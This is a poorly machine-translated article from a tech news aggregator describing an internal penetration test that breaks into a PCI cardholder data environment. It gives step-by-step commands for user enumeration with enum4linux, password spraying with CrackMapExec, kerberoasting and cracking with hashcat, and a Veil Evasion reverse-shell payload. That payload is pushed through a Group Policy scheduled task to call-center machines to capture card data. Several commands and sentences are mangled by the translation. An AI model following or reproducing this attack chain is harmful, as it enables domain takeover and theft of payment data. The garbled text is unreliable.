Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use the Windows domain to bypass the firewall to obtain access to cardholder data. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

We will show you how to bypass the firewall system and gain access to the cardholder data environment (CDE). Ultimate goal: extract the credit card data of the target user.

If you need to store, transmit or process credit card data in your network, then the security of credit card data must be effectively guaranteed. According to the PCI data Security Standard (PCI-DSS), cardholder data can be transmitted and sent directly in the internal network, as long as the network system has implemented network segmentation, and the definition of this network scope (dividing the cardholder data environment from other networks) is generally realized through firewalls.

In order to protect the customer's confidential data, we need to modify the implementation details of the network. Suppose the company has a very large network system, with all addresses in the range of 10.0.0.0and8. Cardholder data needs to be separately divided into the range of 192.168.0 and 16, and isolated through the firewall.

Note: CDE is generally composed of a call center (responsible for handling telephone orders) and an operator (responsible for filling in payment information into the Web form).

This test is only an internal test, so we connect directly to the company's internal office network (10.0.0.0and8 address range). Scan the CDE environment from this address using ping commands and port scanning:

Ping scanning is basically equivalent to running the ping command directly, but nmap can scan the entire IP segment "with one click". "hosts up" is the output of the second command, because we added the "- Pn" parameter to determine whether it is the first ping, so nmap will report all "up" hosts in the current range.

Therefore, the effect of this approach will not be ideal unless firewall rules are deployed to bypass vulnerabilities, or firewalls use weak passwords. Therefore, the first thing we should not do is how to control the active directory by obtaining domain administrator privileges.

How do I become a domain administrator?

In our scenario, we chose to use kerberoast to control the domain. The first step in invading the active Directory usually requires access to any user account, as long as we can pass the authentication of the domain controller. In Windows, all accounts can be authenticated by domain controllers, even if they don't have permission to do actual things. In other words, the least privileged account can be verified as long as the login is completed and the correct password is entered.

Sessions are not enabled in the domain controller on this user's site. Therefore, our domain controller is 10.0.12.100, "PETER". We can use features such as enum4linux to enumerate the list of users and get the user name of each user in the domain:

$enum4linux-R 1000-50000 10.0.12.100 | tee enum4linux.txt

Once we have the user list, we can parse it:

$cat enum4linux.txt | grep'(LocalUser)'| awk'$2 ~ / MACFARLANE\\ / {print $2}'| grep-vP'^. *?\ $$'| sed's/MACFARLANE\ / / g'

The network is huge, with more than 25000 active users, but I used grep for simple user filtering to demonstrate our attack.

Now, with the text file containing the user list, we can use tools such as CrackMapExec to guess the user's password. Here we guess whether the password of the target account is "Password1":

$cme smb 10.0.12.100-u users.txt-pPassword1

If we want to continue guessing, we need to specify the "--continue-on-success" parameter:

Once we get this user account, we can query the active directory and get a list of service accounts. Service accounts are the user accounts that run for the service, such as Microsoft SQL Server, etc., which need to be run in a specific user account environment. The active Directory's Kerberos authentication system can be used to provide access, so the active Directory provides a "service token" to run users for authentication.

By requesting a list of Kerberos service accounts from the domain controller, we can also get a "service token" for each account. This service token is encrypted with the password of the service account. So, if we crack the password, we can use this account, which is usually a highly privileged account:

We can see that one of the accounts is a member of the domain management group, so we can crack it directly:

$hashcat-m 13100-potfile-disableSPNs.txt / usr/share/wordlists/rockyou.txt-r / usr/share/rules/d3adhob0.rule

After Hashcat runs, we get the plaintext password:

This is an active account, and we can use CrackMapExec again:

$cme smb 10.0.12.100-u redrum-paired murder1percent'

Very good, we got the administrator account of the domain controller!

Now, although we do not have direct access to the target device, we can get the domain controller to help us interact with the target device through the active directory domain. Our goal is to control other computers in the same active directory through the call center in CDE. To do this, we also need to learn more about Group Policy objects (GPO).

GPO allows various scope-level settings to be applied to users and computers, and it can control computers in the domain at different scope levels. Many of the features of the customer GPO are applicable to the unified management of IT settings in the organization. For example, uniformly set the password policy, or uniformly set which icons are displayed for the user's desktop (for example, a shortcut to open a company website). And there is a GPO that can run Microsoft's "scheduled tasks", which is exactly what we need.

Here I created a script that needs to be run on the target machine to connect them back to our machine. Here are the specific steps:

1. Generate payload. Here we use Veil Evasion. Our IP address is 10.0.12.1, so we set up to connect back to this address:

$veil-t EVASION-p 22-- ip 10.0.12.1--port 8755-o pci_shell

two。 Log in to the domain controller through remote Desktop Protocol (RDP) using the credentials we obtained from kerberoasting.

3. Find CDE in the active directory. According to our knowledge of the target, their call center works on the second floor. By browsing the catalog, we navigate to a special name:

4. Put the malicious script we made with Veil into a folder and share it on the domain controller. Set permissions on shares and directories to allow all domain users to read:

5. Create a GPO policy:

6. When editing this new GPO, click "schedule tasks" and create a new "schedule tasks now":

7. Create a task that points to a shared malicious script. Also set "Run in logged-on user's securitycontext" under common:

After waiting for a moment, the situation is as follows:

Yes, that's the payment card data we need:

The infiltration work has been completed at present!

On how to use the Windows domain to bypass the firewall to get access to cardholder data is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.